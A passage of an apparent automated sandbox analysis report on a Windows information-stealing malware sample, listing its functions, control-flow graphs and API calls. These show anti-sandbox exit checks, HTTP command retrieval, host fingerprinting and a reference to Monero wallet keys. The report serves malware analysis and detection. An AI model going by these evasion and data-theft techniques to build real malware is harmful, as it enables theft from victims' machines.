                                • GetProcAddress.KERNEL32(75480000,008F88A0), ref: 00E2A641
                                • GetProcAddress.KERNEL32(75480000,008FCD38), ref: 00E2A659
                                • GetProcAddress.KERNEL32(75480000,008FCC90), ref: 00E2A672
                                • GetProcAddress.KERNEL32(753B0000,008E62A0), ref: 00E2A693
                                • GetProcAddress.KERNEL32(6D600000,008FCCA8), ref: 00E2A6B4
                                • GetProcAddress.KERNEL32(6D600000,008E6380), ref: 00E2A6CD
                                • GetProcAddress.KERNEL32(6D600000,008FCCD8), ref: 00E2A6E5
                                • GetProcAddress.KERNEL32(6D600000,008FCCF0), ref: 00E2A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: d00f571608e1247e4d06da186cb2d565dfc3da348319f04bfd2b1b50d953de0f
                                • Instruction ID: 9591c47fda6a1b5c705f104dd775e0c634245c03084395d307072bb69d03f792
                                • Opcode Fuzzy Hash: d00f571608e1247e4d06da186cb2d565dfc3da348319f04bfd2b1b50d953de0f
                                • Instruction Fuzzy Hash: EA62E8B5710308EFC764DFA8E9989673BF9F78C601714875AA68AC324CD63F9841DB60
                                Function 00E16280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1033 e16280-e1630b call e2a7a0 call e147b0 call e2a740 InternetOpenA StrCmpCA 1040 e16314-e16318 1033->1040 1041 e1630d 1033->1041 1042 e16509-e16525 call e2a7a0 call e2a800 * 2 1040->1042 1043 e1631e-e16342 InternetConnectA 1040->1043 1041->1040 1061 e16528-e1652d 1042->1061 1044 e16348-e1634c 1043->1044 1045 e164ff-e16503 InternetCloseHandle 1043->1045 1047 e1635a 1044->1047 1048 e1634e-e16358 1044->1048 1045->1042 1050 e16364-e16392 HttpOpenRequestA 1047->1050 1048->1050 1052 e164f5-e164f9 InternetCloseHandle 1050->1052 1053 e16398-e1639c 1050->1053 1052->1045 1055 e163c5-e16405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 e1639e-e163bf InternetSetOptionA 1053->1056 1058 e16407-e16427 call e2a740 call e2a800 * 2 1055->1058 1059 e1642c-e1644b call e28940 1055->1059 1056->1055 1058->1061 1066 e164c9-e164e9 call e2a740 call e2a800 * 2 1059->1066 1067 e1644d-e16454 1059->1067 1066->1061 1070 e164c7-e164ef InternetCloseHandle 1067->1070 1071 e16456-e16480 InternetReadFile 1067->1071 1070->1052 1074 e16482-e16489 1071->1074 1075 e1648b 1071->1075 1074->1075 1079 e1648d-e164c5 call e2a9b0 call e2a8a0 call e2a800 1074->1079 1075->1070 1079->1071
                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14839
                                  • Part of subcall function 00E147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14849
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • InternetOpenA.WININET(00E30DFE,00000001,00000000,00000000,00000000), ref: 00E162E1
                                • StrCmpCA.SHLWAPI(?,008FE5C0), ref: 00E16303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16335
                                • HttpOpenRequestA.WININET(00000000,GET,?,008FDC58,00000000,00000000,00400100,00000000), ref: 00E16385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E163BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E163D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E163FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E1646D
                                • InternetCloseHandle.WININET(00000000), ref: 00E164EF
                                • InternetCloseHandle.WININET(00000000), ref: 00E164F9
                                • InternetCloseHandle.WININET(00000000), ref: 00E16503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: 81a44bfa8f2a579c110e4dc93865bff4d74c9d770f4fa490656e387a8b0defe7
                                • Instruction ID: 40057ed71b7c90c9e72a025df92635f0bcb26063512fb1a67cb857c40a8a6583
                                • Opcode Fuzzy Hash: 81a44bfa8f2a579c110e4dc93865bff4d74c9d770f4fa490656e387a8b0defe7
                                • Instruction Fuzzy Hash: 63714A71A00318EBDB24DFA0DC59BEEB7B8BB44700F1091A9F50A7B184DBB56A85CF51
                                Function 00E25510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 e25510-e25577 call e25ad0 call e2a820 * 3 call e2a740 * 4 1106 e2557c-e25583 1090->1106 1107 e255d7-e2564c call e2a740 * 2 call e11590 call e252c0 call e2a8a0 call e2a800 call e2aad0 StrCmpCA 1106->1107 1108 e25585-e255b6 call e2a820 call e2a7a0 call e11590 call e251f0 1106->1108 1134 e25693-e256a9 call e2aad0 StrCmpCA 1107->1134 1138 e2564e-e2568e call e2a7a0 call e11590 call e251f0 call e2a8a0 call e2a800 1107->1138 1124 e255bb-e255d2 call e2a8a0 call e2a800 1108->1124 1124->1134 1139 e256af-e256b6 1134->1139 1140 e257dc-e25844 call e2a8a0 call e2a820 * 2 call e11670 call e2a800 * 4 call e26560 call e11550 1134->1140 1138->1134 1144 e257da-e2585f call e2aad0 StrCmpCA 1139->1144 1145 e256bc-e256c3 1139->1145 1270 e25ac3-e25ac6 1140->1270 1164 e25991-e259f9 call e2a8a0 call e2a820 * 2 call e11670 call e2a800 * 4 call e26560 call e11550 1144->1164 1165 e25865-e2586c 1144->1165 1149 e256c5-e25719 call e2a820 call e2a7a0 call e11590 call e251f0 call e2a8a0 call e2a800 1145->1149 1150 e2571e-e25793 call e2a740 * 2 call e11590 call e252c0 call e2a8a0 call e2a800 call e2aad0 StrCmpCA 1145->1150 1149->1144 1150->1144 1250 e25795-e257d5 call e2a7a0 call e11590 call e251f0 call e2a8a0 call e2a800 1150->1250 1164->1270 1171 e25872-e25879 1165->1171 1172 e2598f-e25a14 call e2aad0 StrCmpCA 1165->1172 1179 e258d3-e25948 call e2a740 * 2 call e11590 call e252c0 call e2a8a0 call e2a800 call e2aad0 StrCmpCA 1171->1179 1180 e2587b-e258ce call e2a820 call e2a7a0 call e11590 call e251f0 call e2a8a0 call e2a800 1171->1180 1201 e25a16-e25a21 Sleep 1172->1201 1202 e25a28-e25a91 call e2a8a0 call e2a820 * 2 call e11670 call e2a800 * 4 call e26560 call e11550 1172->1202 1179->1172 1275 e2594a-e2598a call e2a7a0 call e11590 call e251f0 call e2a8a0 call e2a800 1179->1275 1180->1172 1201->1106 1202->1270 1250->1144 1275->1172
                                APIs
                                  • Part of subcall function 00E2A820: lstrlen.KERNEL32(00E14F05,?,?,00E14F05,00E30DDE), ref: 00E2A82B
                                  • Part of subcall function 00E2A820: lstrcpy.KERNEL32(00E30DDE,00000000), ref: 00E2A885
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E256A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25857
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E251F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25228
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E252C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25318
                                  • Part of subcall function 00E252C0: lstrlen.KERNEL32(00000000), ref: 00E2532F
                                  • Part of subcall function 00E252C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00E25364
                                  • Part of subcall function 00E252C0: lstrlen.KERNEL32(00000000), ref: 00E25383
                                  • Part of subcall function 00E252C0: lstrlen.KERNEL32(00000000), ref: 00E253AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E2578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00E25A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 5abf67085bfbb398fc31b54cb1622d2059e911ad95d9e3870d40726ef122cea3
                                • Instruction ID: c2dc3817eeb3a9ca3a4449e7b6530e78ca3441811a7dec8780e5435e67e8c708
                                • Opcode Fuzzy Hash: 5abf67085bfbb398fc31b54cb1622d2059e911ad95d9e3870d40726ef122cea3
                                • Instruction Fuzzy Hash: 29E15F729102189BCB1CFBA0FD56AFE73B9AF54300F449168F50677095EF356A09CBA2
                                Function 00E217A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1301 e217a0-e217cd call e2aad0 StrCmpCA 1304 e217d7-e217f1 call e2aad0 1301->1304 1305 e217cf-e217d1 ExitProcess 1301->1305 1309 e217f4-e217f8 1304->1309 1310 e219c2-e219cd call e2a800 1309->1310 1311 e217fe-e21811 1309->1311 1313 e21817-e2181a 1311->1313 1314 e2199e-e219bd 1311->1314 1316 e21821-e21830 call e2a820 1313->1316 1317 e21849-e21858 call e2a820 1313->1317 1318 e218cf-e218e0 StrCmpCA 1313->1318 1319 e2198f-e21999 call e2a820 1313->1319 1320 e218ad-e218be StrCmpCA 1313->1320 1321 e21932-e21943 StrCmpCA 1313->1321 1322 e21913-e21924 StrCmpCA 1313->1322 1323 e21970-e21981 StrCmpCA 1313->1323 1324 e218f1-e21902 StrCmpCA 1313->1324 1325 e21951-e21962 StrCmpCA 1313->1325 1326 e21835-e21844 call e2a820 1313->1326 1327 e2187f-e21890 StrCmpCA 1313->1327 1328 e2185d-e2186e StrCmpCA 1313->1328 1314->1309 1316->1314 1317->1314 1336 e218e2-e218e5 1318->1336 1337 e218ec 1318->1337 1319->1314 1334 e218c0-e218c3 1320->1334 1335 e218ca 1320->1335 1342 e21945-e21948 1321->1342 1343 e2194f 1321->1343 1340 e21930 1322->1340 1341 e21926-e21929 1322->1341 1347 e21983-e21986 1323->1347 1348 e2198d 1323->1348 1338 e21904-e21907 1324->1338 1339 e2190e 1324->1339 1344 e21964-e21967 1325->1344 1345 e2196e 1325->1345 1326->1314 1332 e21892-e2189c 1327->1332 1333 e2189e-e218a1 1327->1333 1330 e21870-e21873 1328->1330 1331 e2187a 1328->1331 1330->1331 1331->1314 1352 e218a8 1332->1352 1333->1352 1334->1335 1335->1314 1336->1337 1337->1314 1338->1339 1339->1314 1340->1314 1341->1340 1342->1343 1343->1314 1344->1345 1345->1314 1347->1348 1348->1314 1352->1314
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00E217C5
                                • ExitProcess.KERNEL32 ref: 00E217D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 3cc5efc9a2d205e61a3cbc603bd2fa328bff1cd8df69348a5e29a5e6c90e0bc8
                                • Instruction ID: 929d3a8e9fb180bd35c6e3a2fad974fd48e248c18f3ec112360a9563b62bfcbe
                                • Opcode Fuzzy Hash: 3cc5efc9a2d205e61a3cbc603bd2fa328bff1cd8df69348a5e29a5e6c90e0bc8
                                • Instruction Fuzzy Hash: E05160B4B04219EFCB08DFA0E968ABE77F9BF94704F106098E40677244D775EA81CB61
                                Function 00E27500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1356 e27500-e2754a GetWindowsDirectoryA 1357 e27553-e275c7 GetVolumeInformationA call e28d00 * 3 1356->1357 1358 e2754c 1356->1358 1365 e275d8-e275df 1357->1365 1358->1357 1366 e275e1-e275fa call e28d00 1365->1366 1367 e275fc-e27617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 e27628-e27658 wsprintfA call e2a740 1367->1369 1370 e27619-e27626 call e2a740 1367->1370 1377 e2767e-e2768e 1369->1377 1370->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E27542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E2757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E2760A
                                • wsprintfA.USER32 ref: 00E27640
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\$
                                • API String ID: 1544550907-3109660283
                                • Opcode ID: 9fc116894a89d50c68ace7145021b714f000be6c0dd9f3214be409b87a65cb75
                                • Instruction ID: e5e1f9f731eb7ee55a6ef64f6c2a70bb980c5dfa2084f84008ff0395cc49af30
                                • Opcode Fuzzy Hash: 9fc116894a89d50c68ace7145021b714f000be6c0dd9f3214be409b87a65cb75
                                • Instruction Fuzzy Hash: BA417FB1E04358EBDB10DB94EC45BEEBBB8EB08704F101199F64977280DB796A44CBA5
                                Function 00E269F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F0780), ref: 00E298A1
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F0798), ref: 00E298BA
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F0660), ref: 00E298D2
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F07B0), ref: 00E298EA
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F05A0), ref: 00E29903
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F89A0), ref: 00E2991B
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008E6760), ref: 00E29933
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008E67C0), ref: 00E2994C
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F0678), ref: 00E29964
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F07C8), ref: 00E2997C
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F05B8), ref: 00E29995
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F05D0), ref: 00E299AD
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008E68A0), ref: 00E299C5
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F05E8), ref: 00E299DE
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E111D0: ExitProcess.KERNEL32 ref: 00E11211
                                  • Part of subcall function 00E11160: GetSystemInfo.KERNEL32(?), ref: 00E1116A
                                  • Part of subcall function 00E11160: ExitProcess.KERNEL32 ref: 00E1117E
                                  • Part of subcall function 00E11110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E1112B
                                  • Part of subcall function 00E11110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E11132
                                  • Part of subcall function 00E11110: ExitProcess.KERNEL32 ref: 00E11143
                                  • Part of subcall function 00E11220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E1123E
                                  • Part of subcall function 00E11220: __aulldiv.LIBCMT ref: 00E11258
                                  • Part of subcall function 00E11220: __aulldiv.LIBCMT ref: 00E11266
                                  • Part of subcall function 00E11220: ExitProcess.KERNEL32 ref: 00E11294
                                  • Part of subcall function 00E26770: GetUserDefaultLangID.KERNEL32 ref: 00E26774
                                  • Part of subcall function 00E11190: ExitProcess.KERNEL32 ref: 00E111C6
                                  • Part of subcall function 00E27850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27880
                                  • Part of subcall function 00E27850: RtlAllocateHeap.NTDLL(00000000), ref: 00E27887
                                  • Part of subcall function 00E27850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E2789F
                                  • Part of subcall function 00E278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27910
                                  • Part of subcall function 00E278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E27917
                                  • Part of subcall function 00E278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00E2792F
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008F89E0,?,00E3110C,?,00000000,?,00E31110,?,00000000,00E30AEF), ref: 00E26ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E26AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00E26AF9
                                • Sleep.KERNEL32(00001770), ref: 00E26B04
                                • CloseHandle.KERNEL32(?,00000000,?,008F89E0,?,00E3110C,?,00000000,?,00E31110,?,00000000,00E30AEF), ref: 00E26B1A
                                • ExitProcess.KERNEL32 ref: 00E26B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: e46d084a02062b07a4491ea6bfee0fe9bfbf05ba89cecdfadd4dd2c3de1819cf
                                • Instruction ID: 57fa167901faf5f49fb0228ccf649a9a32d87a9f5880d3cf04cb5ddeea0305b2
                                • Opcode Fuzzy Hash: e46d084a02062b07a4491ea6bfee0fe9bfbf05ba89cecdfadd4dd2c3de1819cf
